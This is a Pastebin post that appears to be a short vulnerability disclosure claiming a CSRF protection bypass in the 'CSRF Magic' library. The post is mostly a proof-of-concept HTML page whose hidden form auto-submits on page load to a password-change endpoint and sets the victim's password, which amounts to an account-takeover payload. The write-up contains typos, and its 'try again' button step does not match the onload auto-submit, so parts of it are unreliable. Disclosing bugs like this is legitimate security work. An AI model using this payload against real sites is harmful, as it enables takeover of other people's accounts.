Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- CSRF Magic Library
- Issue:- CSRF vulnerability.
- Vulnerability Description :- The CSRF Magic is vulnerable to CSRF protection bypass. Due to this flaw an remote attacker can exploit this vulnerability by
- crafting the malicious page and disperses it to the victim via social engineering ways enticing them to
- click the link. Once the user/victim clicks the `try again` button, attacker can takeover the account and
- perform untintended actions on vitim’s behalf.
- Steps to Reproduce :-
- 1. Create a malicious page containing the below values.
- <!DOCTYPE html>
- <html>
- <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
- <form id="myForm" action="https://target.com/password_change.php" method="POST">
- <input type=hidden name="password" value=”secret”>
- <input type=hidden name=”conformed_password” value="secret">
- </form>
- </body>
- </html>
- 2. Once cliked on the "Try again" button attack will get executed by asking password change.
Add Comment
Please, Sign In to add comment